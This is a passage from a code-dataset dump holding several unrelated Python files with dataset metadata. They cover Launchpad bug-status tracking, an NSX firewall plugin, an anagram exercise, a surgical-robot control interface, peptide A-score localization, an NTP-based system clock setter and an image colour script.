lpdata.LaunchpadData.BUG_STATUSES[\"New\"]:\n return []\n\n # list of dates\n result = []\n\n # When the bug was assigned to the release\n date_open = min(d for d in [self.date_triaged, self.date_confirmed, self.date_left_new, self.date_assigned] if d is not None)\n result.append( {\"date\": date_open, \"type\": \"Open\", \"matches\": [s for s in lpdata.LaunchpadData.BUG_STATUSES[\"Open\"] if s != \"In Progress\"]} )\n\n # When the bug went to in progress state\n date_in_progress = self.date_in_progress\n result.append( {\"date\": date_in_progress, \"type\": \"In Progress\", \"matches\": [\"In Progress\"]} )\n\n # When the bug was resolved or closed (e.g. as invalid)\n date_resolved = next((d for d in [self.date_fix_committed, self.date_closed] if d is not None), None)\n result.append( {\"date\": date_resolved, \"type\": \"Resolved\", \"matches\": [s for s in lpdata.LaunchpadData.BUG_STATUSES[\"Closed\"] if s != \"Fix Released\"]} )\n\n # When the bug was verified\n date_verified = self.date_fix_released\n result.append( {\"date\": date_verified, \"type\": \"Verified\", \"matches\": [\"Fix Released\"]} )\n\n # When the bug was set as incomplete\n date_incomplete = self.date_incomplete\n result.append( {\"date\": date_incomplete, \"type\": \"Incomplete\", \"matches\": lpdata.LaunchpadData.BUG_STATUSES[\"Incomplete\"]} )\n\n # Remove all entries which have date as \"None\"\n result = [e for e in result if e[\"date\"] is not None]\n\n # Filter dates and statuses which are out of line\n for i in range(0, len(result)):\n for j in range (i + 1, len(result)):\n if result[i][\"date\"] > result[j][\"date\"]:\n result[i][\"obsolete\"] = True\n\n # Remove all obsoleted entries\n result = [e for e in result if not \"obsolete\" in e]\n\n # Find the first element which matches our bug status\n idx = -1\n for i in range(0, len(result)):\n if self.status in result[i][\"matches\"]:\n idx = i\n break\n\n # The date for our status is not found. Not sure if it can happen\n if idx < 0:\n return []\n\n # Get the corresponding prefix of result, so it ends with the right status (the status in which our bug is in)\n result = result[:idx+1]\n\n return result\n","sub_path":"launchpad/bug.py","file_name":"bug.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76050232","text":"# Copyright 2018 VMware, Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import exceptions as n_exc\nfrom neutron_lib.plugins import directory\n\nfrom vmware_nsx.plugins.nsx import utils as tvd_utils\n\ntry:\n from neutron_fwaas.services.firewall import fwaas_plugin\nexcept ImportError:\n # FWaaS project no found\n from vmware_nsx.services.fwaas.common import fwaas_mocks \\\n as fwaas_plugin\n\n\n@tvd_utils.filter_plugins\nclass FwaasTVPluginV1(fwaas_plugin.FirewallPlugin):\n \"\"\"NSX-TV plugin for Firewall As A Service - V1.\n\n This plugin adds separation between T/V instances\n \"\"\"\n methods_to_separate = ['get_firewalls',\n 'get_firewall_policies',\n 'get_firewall_rules']\n\n def validate_firewall_routers_not_in_use(\n self, context, router_ids, fwid=None):\n # Override this method to verify that the router & firewall belongs to\n # the same plugin\n context_plugin_type = tvd_utils.get_tvd_plugin_type_for_project(\n context.project_id, context)\n core_plugin = directory.get_plugin()\n for rtr_id in router_ids:\n rtr_plugin = core_plugin._get_plugin_from_router_id(\n context, rtr_id)\n if rtr_plugin.plugin_type() != context_plugin_type:\n err_msg = (_('Router should belong to the %s plugin '\n 'as the firewall') % context_plugin_type)\n raise n_exc.InvalidInput(error_message=err_msg)\n","sub_path":"vmware_nsx/services/fwaas/nsx_tv/plugin_v1.py","file_name":"plugin_v1.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"214444389","text":"# Exercise\n\n# Create a function named is anagram following your current language's style guide. \n# It should take two strings and return a boolean value depending on whether its an anagram or not.\n\n\ndef dict_of_letters(a_str):\n a_dict = {}\n for c in a_str:\n if c not in a_dict:\n a_dict[c]=1\n else:\n a_dict[c] += 1\n return a_dict\n\ndef is_anagram(str1, str2):\n print(str1)\n print(str2)\n if dict_of_letters(str1) == dict_of_letters(str2):\n return True\n else:\n return False\n \n # A function with for loop\n #\n # d1 = dict_of_letters(str1)\n # l1 = sorted(d1.keys())\n # d2 = dict_of_letters(str2)\n # l2 = sorted(d2.keys())\n # for i in range(len(l1)):\n # if l1[i] != l2[i] or d1[l1[i]] != d2[l2[i]]:\n # return False\n # return True\n\nprint(is_anagram(\"kék\", \"zöld\"))\n\nprint(is_anagram(\"animali\", \"almaini\"))\n\n","sub_path":"week-02/day-05/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442329619","text":"\"\"\"\nAuris Surgical Robotics, Inc.\n(C) Copyright 2015. All Rights Reserved.\n\nDescription: Library for setting up python for use with developmental systems\n\nAuthor: Ben Fredrickson\nDate: Jan 2015\n\"\"\"\n\nimport sys\nimport os\nimport time\nfrom winreg import *\n\n#load the path for \nreg = OpenKey(HKEY_LOCAL_MACHINE, \"SOFTWARE\\\\Python\\\\PythonCore\\\\%s\\\\\" % (sys.version[:3]))\naurispath = QueryValue(reg, \"AurisPath\")\nsys.path.append(aurispath)\n\n\n# Add auris dlls to the path for importing\nos.environ[\"PATH\"] += \";\" + aurispath + \"..\\\\DLLS;\"\n\nimport AurisInterface\n\nLOW_LEVEL_VERSION = 8\n\ng_btnMap = {\n 'DUP': 0,\n 'DDWN': 1,\n 'DLEFT': 2,\n 'DRIGHT': 3,\n 'START': 4,\n 'BACK': 5,\n 'STICKPRESSL': 6,\n 'STICKPRESSR': 7,\n 'LEFTB': 8,\n 'RIGHTB': 9,\n 'A': 10,\n 'B': 11,\n 'X': 12,\n 'Y': 13,\n }\n\ng_jntMap = {\n 'LX': 0,\n 'TRIGL': 1,\n 'LY': 2,\n 'RX': 3,\n 'RY': 4,\n 'TRIGR': 5,\n }\n\nclass PyAurisInterface(object):\n def __init__(self):\n # make sure the interface is initailized for the correct use case\n self.interInit = False\n self.idmInit = False\n self.visionInit = False\n self.gamepadInit = False\n self.slideInit = False\n\n # need a ref to AurisInterface for the garbage collector\n self.interface = AurisInterface\n if (AurisInterface.GetVersion() != LOW_LEVEL_VERSION):\n print(\"Python Lib does not match compiled Lib\",\n AurisInterface.GetVersion(),\n \"!= auris low level version\",\n LOW_LEVEL_VERSION)\n raise Exception(\"Version Mismatch.\")\n\n\n def __del__(self):\n \"\"\" Closes down network and does any other work that needs to be done. \"\"\"\n AurisInterface.CloseNetwork()\n\n\n def CheckIDM(self):\n if (not self.interInit or not self.idmInit):\n print(\"Attempting to use IDM before it is initialized.\")\n raise Exception(\"IDM Initialization\")\n\n\n def CheckVision(self):\n if (not self.interInit or not self.visionInit):\n print(\"Attempting to use Vision before it is initialized.\")\n raise Exception(\"Vision Initialization\")\n\n\n def CheckGamePad(self):\n if (not self.gamepadInit):\n print(\"Attempting to use Game Pad before it is initialized.\")\n raise Exception(\"Game Pad Initialization\")\n\n def CheckLinearSlide(self):\n if (not self.slideInit):\n print(\"Attempting to use Linear Slide before it is initialized.\")\n raise Exception(\"Linear Slide Initialization\")\n\n\n def Initialize(self, domainId, testIPAddr = None):\n print(\"Initializing Network ...\")\n if (testIPAddr != None):\n print(\"Pinging ip (\", testIPAddr, \") (must be UID 0) ...\")\n resp = os.system(\"ping -c 1 \" + testIPAddr)\n if (resp != 0):\n print(\"Failed to ping IDM.\")\n if (AurisInterface.GetVersion() != LOW_LEVEL_VERSION):\n print(\"Python Lib does not match compiled Lib\",\n AurisInterface.GetVersion(),\n \"!= auris low level version \",\n LOW_LEVEL_VERSION)\n return -1\n if (AurisInterface.InitializeNetwork(domainId) != 0):\n print(\"Failed to connect to RTI\")\n return -1\n else:\n print(\"Network Configured.\")\n self.visionInit = True\n self.interInit = True\n sys.stdout.flush()\n return 0\n\n\n def EstablishIDMConnection(self, wait = 10.0):\n if (AurisInterface.EstablishIDMConnection(10.0) != 0):\n print(\"Failed to establish connection\")\n return -1\n else:\n print(\"Connection Established.\")\n self.idmInit = True\n return 0\n\n\n def InitializeGamePad(self):\n \"\"\" Start the joystick code running. \"\"\"\n err = AurisInterface.InitializeGamePad()\n if err == 0:\n self.gamepadInit = True\n sys.stdout.flush()\n return self.gamepadInit\n\n def InitializeLinearSlide(self):\n \"\"\" Start the linear slide code running. \"\"\"\n err = AurisInterface.InitializeLinearSlide()\n if err == 0:\n self.slideInit = True\n sys.stdout.flush()\n return self.slideInit\n \n\n def LoadLeader(self, instrument):\n \"\"\" Loads a leader instrument. \"\"\"\n self.CheckIDM()\n return AurisInterface.LoadLeader(instrument)\n\n\n def LoadSheath(self, instrument):\n \"\"\" Loads a sheath instrument. \"\"\"\n self.CheckIDM()\n return AurisInterface.LoadSheath(instrument)\n \n \n def GetMotorCurrents(self):\n \"\"\" Returns the actual currents being applied to each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetMotorCurrents()\n\n \n def GetForceSensors(self):\n \"\"\" Returns the value of the force sensors on each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetForceSensors()\n\n \n def GetDesiredPosition(self):\n \"\"\" Returns the position we have set on each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetDesiredPosition()\n\n \n def SetDesiredPosition(self,\n s1, s2, s3, s4, l1, l2, l3, l4, i1, i2):\n \"\"\" Returns the position we have set on each axis. \n NOTE THE ADDED NEGATIVE!!!\"\"\"\n self.CheckIDM()\n return AurisInterface.SetDesiredPosition(\n s1, s2, s3, s4, l1, l2, l3, l4, -i1, i2)\n\n \n def GetActualPosition(self):\n \"\"\" Returns the position of each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetActualPosition()\n\n \n def SendIDMCommand(self, commandId):\n \"\"\" Send a command (integer) to the IDM. \"\"\"\n self.CheckIDM()\n return AurisInterface.SendIDMCommand(commandId)\n\n\n def GetIDMStatus(self):\n \"\"\" Returns the current IDM status (int). \"\"\"\n self.CheckIDM()\n return AurisInterface.GetIDMStatus()\n\n\n def GetLeaderTensionStatus(self):\n \"\"\" Returns the tensioning status of the leader \"\"\"\n self.CheckIDM()\n return AurisInterface.GetTensionStatus()[1]\n\n\n def GetSheathTensionStatus(self):\n \"\"\" Returns the tensioning status of the leader \"\"\"\n self.CheckIDM()\n return AurisInterface.GetTensionStatus()[0]\n\n\n def GetVisionResult(self):\n \"\"\" Returns the last vision result from the ClinicalUI. \"\"\"\n self.CheckVision()\n return AurisInterface.GetVisionResult()\n\n\n def GetGamePadButton(self, index):\n \"\"\" Return the value of the button at the given index. \"\"\"\n self.CheckGamePad()\n return AurisInterface.GetGamePadButton(index)\n\n\n def GetGamePadJoint(self, index):\n \"\"\" Return the value of the joint at the given index. \"\"\"\n self.CheckGamePad()\n return AurisInterface.GetGamePadJoint(index)\n\n def LinearSlideHome(self):\n \"\"\" Reset and goto the zero on the linear slide. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideHome()\n\n def LinearSlideMove(self, Xmm):\n \"\"\" Set the x position in milimeters of the slide. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMove(Xmm)\n \n def LinearSlideMotorRunning(self):\n \"\"\" Returns true when the motor is on. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMotorRunning()\n\n def LinearSlideWaitForStop(self, timeoutSec):\n \"\"\" Blocks until the motor stops moveing or timeout is reached. Returns -1 if\n timedout and zero otherwise.\"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideWaitForStop(timeoutSec)\n\n def LinearSlidePosition(self):\n \"\"\" Get the current x position in millimeters. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlidePosition()\n\n def LinearSlideMinLimit(self):\n \"\"\" Return the lowest allowable position in millimeters. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMinLimit()\n \n def LinearSlideMaxLimit(self):\n \"\"\" Return the highest allowable position in millimeters. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMaxLimit()\n\n def LinearSlideEnableButtonMode(self, run):\n \"\"\" Toggle automatic listening to joystick (must init joystick). \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideEnableButtonMode(run)\n\n\n# g_PyAuris = PyAurisInterface() \n","sub_path":"catheter_simulation/robot/private/AurisLowLevel.py","file_name":"AurisLowLevel.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"355149247","text":"# -*- coding: utf-8 -*-\nimport itertools\nimport math\n\nfrom collections import namedtuple, defaultdict\nfrom decimal import Decimal\n\nimport numpy as np\nfrom scipy.special import comb\n\nfrom glycopeptidepy.utils.memoize import memoize\nfrom glycopeptidepy.algorithm import PeptidoformGenerator, ModificationSiteAssignmentCombinator\n\nfrom ms_deisotope.peak_set import window_peak_set\n\n\nMAX_MISSING_A_SCORE = 1e3\n\n\n@memoize(100000000000)\ndef binomial_pmf(n, i, p):\n try:\n return comb(n, i, exact=True) * (p ** i) * ((1 - p) ** (n - i))\n except OverflowError:\n dn = Decimal(n)\n di = Decimal(i)\n dp = Decimal(p)\n x = math.factorial(dn) / (math.factorial(di) * math.factorial(dn - di))\n return float(x * dp ** di * ((1 - dp) ** (dn - di)))\n\n\nclass PeakWindow(object):\n def __init__(self, peaks):\n self.peaks = list(peaks)\n self.max_mass = 0\n self._calculate()\n\n def __iter__(self):\n return iter(self.peaks)\n\n def __getitem__(self, i):\n return self.peaks[i]\n\n def __len__(self):\n return len(self.peaks)\n\n def _calculate(self):\n self.peaks.sort(key=lambda x: x.intensity, reverse=True)\n self.max_mass = 0\n for peak in self.peaks:\n if peak.neutral_mass > self.max_mass:\n self.max_mass = peak.neutral_mass\n\n def __repr__(self):\n template = \"{self.__class__.__name__}({self.max_mass}, {size})\"\n return template.format(self=self, size=len(self))\n\n\n\nclass BlindPeptidoformGenerator(PeptidoformGenerator):\n \"\"\"A sub-class of the :class:`~.PeptidoformGenerator` type that ignores\n site-specificities.\n \"\"\"\n def modification_sites(self, sequence):\n variable_sites = {\n mod.name: set(range(len(sequence))) for mod in self.variable_modifications}\n modification_sites = ModificationSiteAssignmentCombinator(\n variable_sites)\n return modification_sites\n\n\nProbableSitePair = namedtuple(\"ProbableSitePair\", ['peptide1', 'peptide2', 'modifications', 'peak_depth'])\n_ModificationAssignment = namedtuple(\"ModificationAssignment\", [\"site\", \"modification\"])\n\n\nclass ModificationAssignment(_ModificationAssignment):\n __slots__ = []\n\n @property\n def is_ambiguous(self):\n try:\n return len(self.site) > 1\n except TypeError:\n return False\n\n def itersites(self):\n if self.is_ambiguous:\n for i in self.site:\n yield i\n else:\n yield self.site\n\n\nclass AScoreCandidate(object):\n def __init__(self, peptide, modifications, fragments=None):\n self.peptide = peptide\n self.modifications = modifications\n self.fragments = fragments\n\n def __hash__(self):\n return hash(self.peptide)\n\n def __eq__(self, other):\n return self.peptide == other.peptide and self.modifications == other.modifications\n\n def make_solution(self, a_score, permutations=None):\n return AScoreSolution(self.peptide, a_score, self.modifications, permutations, self.fragments)\n\n def __repr__(self):\n template = \"{self.__class__.__name__}({d})\"\n\n def formatvalue(v):\n if isinstance(v, float):\n return \"%0.4f\" % v\n else:\n return str(v)\n d = [\n \"%s=%s\" % (k, formatvalue(v)) if v is not self else \"(...)\" for k, v in sorted(\n self.__dict__.items(), key=lambda x: x[0])\n if (not k.startswith(\"_\") and not callable(v))\n and not (v is None) and k != \"fragments\"]\n\n return template.format(self=self, d=', '.join(d))\n\n\nclass AScoreSolution(AScoreCandidate):\n def __init__(self, peptide, a_score, modifications, permutations, fragments=None):\n super(AScoreSolution, self).__init__(peptide, modifications, fragments)\n self.a_score = a_score\n self.permutations = permutations\n\n\nclass PeptidoformPermuter(object):\n def __init__(self, peptide, modification_rule, modification_count=1, respect_specificity=True):\n self.peptide = peptide\n self.modification_rule = modification_rule\n self.modification_count = modification_count\n self.respect_specificity = respect_specificity\n\n def find_existing(self, modification_rule):\n '''Find existing modifications derived from this rule\n\n Parameters\n ----------\n modification_rule: :class:`~.ModificationRule`\n The modification rule to search for\n\n Returns\n -------\n indices: list\n The indices of :attr:`peptide` where modifications were found\n '''\n indices = []\n for i, position in enumerate(self.peptide):\n if modification_rule in position.modifications:\n indices.append(i)\n return indices\n\n def generate_base_peptides(self, modification_rule):\n \"\"\"Generate peptides from :attr:`peptide` which have had combinations of\n modification sites removed.\n\n Parameters\n ----------\n modification_rule : :class:`~.ModificationRule`\n The modification rule to remove\n\n Returns\n -------\n list\n \"\"\"\n existing_indices = self.find_existing(modification_rule)\n base_peptides = []\n for indices in itertools.combinations(existing_indices, self.modification_count):\n base_peptide = self.peptide.clone()\n for i in indices:\n base_peptide.drop_modification(i, modification_rule)\n base_peptides.append(base_peptide)\n # The target modification was not present, so the unaltered peptide must be the base\n if not base_peptides:\n base_peptides = [self.peptide.clone()]\n return base_peptides\n\n def generate_peptidoforms(self, modification_rule, base_peptides=None):\n if base_peptides is None:\n base_peptides = self.generate_base_peptides(modification_rule)\n if self.respect_specificity:\n PeptidoformGeneratorType = PeptidoformGenerator\n else:\n PeptidoformGeneratorType = BlindPeptidoformGenerator\n pepgen = PeptidoformGeneratorType(\n [], [modification_rule], self.modification_count)\n peptidoforms = defaultdict(set)\n for base_peptide in base_peptides:\n mod_combos = pepgen.modification_sites(base_peptide)\n for mod_combo in mod_combos:\n if len(mod_combo) != self.modification_count:\n continue\n mod_combo = [ModificationAssignment(*mc) for mc in mod_combo]\n peptidoform, _n_mods = pepgen.apply_variable_modifications(\n base_peptide, mod_combo, None, None)\n peptidoforms[peptidoform].update(tuple(mod_combo))\n return [AScoreCandidate(peptide, sorted(mods), self._generate_fragments(peptide))\n for peptide, mods in peptidoforms.items()]\n\n\nclass AScoreEvaluator(PeptidoformPermuter):\n '''\n Calculate a localization statistic for given peptidoform and modification rule.\n\n The original probabilistic model is described in [1]. Implementation based heavily\n on the OpenMS implementation [2].\n\n References\n ----------\n [1] Beausoleil, S. a, Villén, J., Gerber, S. a, Rush, J., & Gygi, S. P. (2006).\n A probability-based approach for high-throughput protein phosphorylation analysis\n and site localization. Nature Biotechnology, 24(10), 1285–1292. https://doi.org/10.1038/nbt1240\n [2] Rost, H. L., Sachsenberg, T., Aiche, S., Bielow, C., Weisser, H., Aicheler, F., … Kohlbacher, O. (2016).\n OpenMS: a flexible open-source software platform for mass spectrometry data analysis. Nat Meth, 13(9),\n 741–748. https://doi.org/10.1038/nmeth.3959\n '''\n def __init__(self, scan, peptide, modification_rule, modification_count=1, respect_specificity=True):\n self._scan = None\n self.peak_windows = []\n\n PeptidoformPermuter.__init__(\n self, peptide, modification_rule, modification_count, respect_specificity)\n self.scan = scan\n self.peptidoforms = self.generate_peptidoforms(self.modification_rule)\n self._fragment_cache = {}\n\n @property\n def scan(self):\n return self._scan\n\n @scan.setter\n def scan(self, value):\n self._scan = value\n if value is None:\n self.peak_windows = []\n else:\n self.peak_windows = list(map(PeakWindow, window_peak_set(value.deconvoluted_peak_set)))\n\n def _generate_fragments(self, peptidoform):\n frags = itertools.chain.from_iterable(\n itertools.chain(\n peptidoform.get_fragments(\"y\"),\n peptidoform.get_fragments(\"b\")))\n frags = list(frags)\n frags.sort(key=lambda x: x.mass)\n return frags\n\n def match_ions(self, fragments, depth=10, error_tolerance=1e-5):\n '''Match fragments against the windowed peak set at a given\n peak depth.\n\n Parameters\n ----------\n fragments: list\n A list of peptide fragments, sorted by mass\n depth: int\n The peak depth to search to, the `i`th most intense peak in\n each window\n error_tolerance: float\n The PPM error tolerance to use when matching peaks.\n\n Returns\n -------\n int:\n The number of fragments matched\n '''\n n = 0\n window_i = 0\n window_n = len(self.peak_windows)\n current_window = self.peak_windows[window_i]\n for frag in fragments:\n while not current_window or (frag.mass >= (current_window.max_mass + 1)):\n window_i += 1\n if window_i == window_n:\n return n\n current_window = self.peak_windows[window_i]\n for peak in current_window[:depth]:\n if abs(peak.neutral_mass - frag.mass) / frag.mass < error_tolerance:\n n += 1\n return n\n\n def permutation_score(self, peptidoform, error_tolerance=1e-5):\n '''Calculate the binomial statistic for this peptidoform\n using the top 1 to 10 peaks.\n\n Parameters\n ----------\n peptidoform: :class:`~.PeptideSequence`\n The peptidoform to score\n error_tolerance: float\n The PPM error tolerance to use when matching peaks.\n\n Returns\n -------\n :class:`numpy.ndarray`:\n The binomial score at peak depth `i + 1`\n\n See Also\n --------\n :meth:`_score_at_window_depth`\n :meth:`match_ions`\n '''\n fragments = peptidoform.fragments\n N = len(fragments)\n site_scores = np.zeros(10)\n for i in range(1, 11):\n site_scores[i - 1] = self._score_at_window_depth(\n fragments, N, i, error_tolerance)\n return site_scores\n\n def _score_at_window_depth(self, fragments, N, i, error_tolerance=1e-5):\n '''Score a fragment collection at a given peak depth, and\n calculate the binomial score based upon the probability mass\n function.\n\n Parameters\n ----------\n fragments: list\n A list of peptide fragments, sorted by mass\n N: int\n The maximum number of theoretical fragments\n i: int\n The peak depth to search through\n error_tolerance: float\n The PPM error tolerance to use when matching peaks.\n\n Returns\n -------\n float\n '''\n n = self.match_ions(fragments, i, error_tolerance=error_tolerance)\n p = i / 100.0\n # If a fragment matches twice, this count can exceed the theoretical maximum.\n if n > N:\n n = N\n cumulative_score = binomial_pmf(N, n, p)\n if cumulative_score == 0.0:\n return 1e3\n return (abs(-10.0 * math.log10(cumulative_score)))\n\n def rank_permutations(self, permutation_scores):\n \"\"\"Rank generated peptidoforms by weighted sum of permutation scores\n\n Parameters\n ----------\n permutation_scores : :class:`list` of :class:`list` of :class:`float`\n The raw output of :meth:`permutation_score` for each peak depth for\n each peptidoform.\n\n Returns\n -------\n :class:`list`\n A list of :class:`tuple` instances of (weighted score, peptidoform index)\n \"\"\"\n ranking = []\n for i, perm_scores in enumerate(permutation_scores):\n ranking.append((self._weighted_score(perm_scores), i))\n ranking.sort(reverse=True)\n return ranking\n\n # Taken directly from reference [1]\n _weight_vector = np.array([\n 0.5, 0.75, 1.0, 1.0, 1.0, 1.0, 0.75, 0.5, .25, .25\n ])\n\n def _weighted_score(self, scores):\n \"\"\"Calculate the weighted sum score over the peak-depth permuted\n binomial score vector.\n\n Parameters\n ----------\n scores : :class:`list`\n The binomial score at each peak depth\n\n Returns\n -------\n float\n \"\"\"\n return self._weight_vector.dot(scores) / 10.0\n\n def score_solutions(self, error_tolerance=1e-5, peptidoforms=None):\n if peptidoforms is None:\n peptidoforms = self.peptidoforms\n scores = [self.permutation_score(candidate, error_tolerance=error_tolerance)\n for candidate in peptidoforms]\n ranked = self.rank_permutations(scores)\n solutions = [peptidoforms[i].make_solution(score, scores[i])\n for score, i in ranked]\n return solutions\n\n def score_localizations(self, solutions, error_tolerance=1e-5):\n \"\"\"Find pairs of sequence solutions which differ in the localization\n of individual modifications w.r.t. to the best match to compute the final\n per-modification A-score.\n\n The first solution in `solutions` is the highest ranked solution, and subsequent\n solutions are searched for the next case where one of the modification of interest\n is located at a different position, forming a pair for that modification site by\n :meth:`find_highest_scoring_permutations`. For each pair, the sequences are re-scored\n using only site-determining ions, and the difference between those scores is the A-score\n for that pair's modification site, as calculated by :meth:`calculate_delta`.\n\n If there are no alternative sites for a given modification, that modification will be\n given the A-score given by :const:`MAX_MISSING_A_SCORE`. If there is another\n localization which scores equally well, the A-score will be 0 by definition of\n the delta step.\n\n Parameters\n ----------\n solutions : list\n The list of :class:`AScoreSolution` objects, ranked by total score\n error_tolerance : float, optional\n The mass error tolerance to use when matching site-determining ions (the default is 1e-5)\n\n Returns\n -------\n :class:`AScoreSolution`\n \"\"\"\n delta_scores = []\n pairs = self.find_highest_scoring_permutations(solutions)\n peptide = solutions[0]\n if not pairs:\n for mod in peptide.modifications:\n delta_scores.append((mod, MAX_MISSING_A_SCORE))\n peptide.a_score = delta_scores\n return peptide\n for pair in pairs:\n delta_score = self.calculate_delta(pair, error_tolerance=error_tolerance)\n pair.peptide1.a_score = delta_score\n delta_scores.append((pair.modifications, delta_score))\n peptide.a_score = delta_scores\n return peptide\n\n def score(self, error_tolerance=1e-5):\n solutions = self.score_solutions(error_tolerance)\n peptide = self.score_localizations(solutions, error_tolerance)\n return peptide\n\n def find_highest_scoring_permutations(self, solutions, best_solution=None, offset=None):\n if best_solution is None:\n best_solution = solutions[0]\n offset = 1\n else:\n if offset is None:\n for i, sol in enumerate(solutions):\n if sol == solutions:\n offset = i + 1\n break\n else:\n raise ValueError(\"Best solution %r not in solution set\")\n permutation_pairs = []\n # for each modification under permutation, find the next best solution which\n # does not have this modification in its set of permuted modifications, and\n # package the pair into a :class:`ProbableSitePair`.\n for site in best_solution.modifications:\n for alt_solution in solutions[offset:]:\n if site not in alt_solution.modifications:\n peak_depth = np.argmax(best_solution.permutations - alt_solution.permutations) + 1\n permutation_pairs.append(ProbableSitePair(best_solution, alt_solution, site, peak_depth))\n break\n return permutation_pairs\n\n def site_determining_ions(self, solutions):\n frag_sets = [set(sol.fragments) for sol in solutions]\n common = set.intersection(*frag_sets)\n n = len(solutions)\n site_determining = []\n for i, _solution in enumerate(solutions):\n cur_frags = frag_sets[i]\n if i == n - 1:\n diff = cur_frags - common\n site_determining.append(sorted(diff, key=lambda x: x.mass))\n else:\n diff = cur_frags - common - frag_sets[i + 1]\n site_determining.append(sorted(diff, key=lambda x: x.mass))\n return site_determining\n\n def calculate_delta(self, candidate_pair, error_tolerance=1e-5):\n if candidate_pair.peptide1 == candidate_pair.peptide2:\n return 0.0\n site_frags = self.site_determining_ions(\n [candidate_pair.peptide1, candidate_pair.peptide2])\n site_frags1, site_frags2 = site_frags[0], site_frags[1]\n N1 = len(site_frags1)\n N2 = len(site_frags2)\n peak_depth = candidate_pair.peak_depth\n P1 = self._score_at_window_depth(\n site_frags1, N1, peak_depth, error_tolerance=error_tolerance)\n P2 = self._score_at_window_depth(\n site_frags2, N2, peak_depth, error_tolerance=error_tolerance)\n return P1 - P2\n","sub_path":"glycan_profiling/tandem/peptide/scoring/localize.py","file_name":"localize.py","file_ext":"py","file_size_in_byte":18452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171082473","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n通过 ntplib 修改系统时间\n1. 如果不带上参数, 进行ntpdate时间同步\n2. 如果参数格式为 \"年-月-日 时:分:秒\", 设置为对应时间\n3. 如果参数格式为时间戳, 设置为对应时间\n本脚本需要管��员权限或者sudo权限才可执行\n本脚本适用于各种操作系统\n\nrequirements:\n pip install ntplib\n\nNTP服务器在中国推荐如下:\n3.cn.pool.ntp.org\n2.cn.pool.ntp.org\n1.cn.pool.ntp.org\ncn.pool.ntp.org\n\n'''\n\nimport sys\nimport os\nimport time\nfrom datetime import datetime\n\nNTP_SERVER = 'cn.pool.ntp.org'\n\ndef get_local_dt_from_ntp():\n import ntplib\n c = ntplib.NTPClient()\n response = c.request(NTP_SERVER)\n ts = response.tx_time\n dt_obj = time.localtime(ts)\n return dt_obj\n\n\ndef set_local_dt(dt_obj, use_ntp=False):\n if use_ntp:\n dt_obj = get_local_dt_from_ntp()\n\n date_str = time.strftime('%Y-%m-%d', dt_obj)\n time_str = time.strftime('%X', dt_obj)\n # time_str = time.strftime('%H:%M:%S', dt_obj) # the same as above\n print('date {} and time {}'.format(date_str, time_str))\n\n if sys.platform in ['win32', 'cygwin']:\n os.system('date {} && time {}'.format(date_str, time_str))\n else: # linux/linux2/darwin\n '''\n 参考 http://osxdaily.com/2012/07/04/set-system-time-mac-os-x-command-line/\n date 命令只能同步到分钟,秒会被重置为0\n 如果要同步到秒,请执行 sudo ntpdate -u cn.pool.ntp.org\n '''\n if use_ntp:\n os.system('sudo ntpdate -u %s' % NTP_SERVER)\n else:\n os.system('sudo date %s' % time.strftime('%m%d%H%M%y', dt_obj))\n\n\nif __name__ == '__main__':\n if len(sys.argv) <= 1: # 没参数\n set_local_dt(None, use_ntp=True)\n sys.exit(0)\n _arg1 = sys.argv[1]\n try:\n # 时分秒格式\n _dt = datetime.strptime(_arg1, '%Y-%m-%d %H:%M:%S')\n set_local_dt(_dt.timetuple())\n except ValueError:\n # 时间戳格式\n _dt_obj = time.localtime(float(_arg1))\n set_local_dt(_dt_obj)\n","sub_path":"set_time_with_ntplib.py","file_name":"set_time_with_ntplib.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69296338","text":"from PIL import Image\n\ndef half_RGB(img):\n \"\"\"reduce the rgb to half for each pixels\n img: PIL Image\n return : reduced image\n \"\"\"\n newImgData = []\n for color in img.getdata():\n r,g,b = color\n newR,newG,newB = r//2, g//2, b//2\n newImgData.append((newR,newG,newB))\n newImg = Image.new(img.mode, img.size)\n newImg.putdata(newImgData)\n return newImg\n\n\n\n\ndef main():\n image = Image.open('westbrook.jpg')\n\n rgb_im = image.convert('RGB')\n\n r_img = half_RGB(rgb_im)\n\n r_img.show()\n r_img.save('Q2.jpg')\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw0/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142565130","text":"import sqlite3\nfrom sqlite3 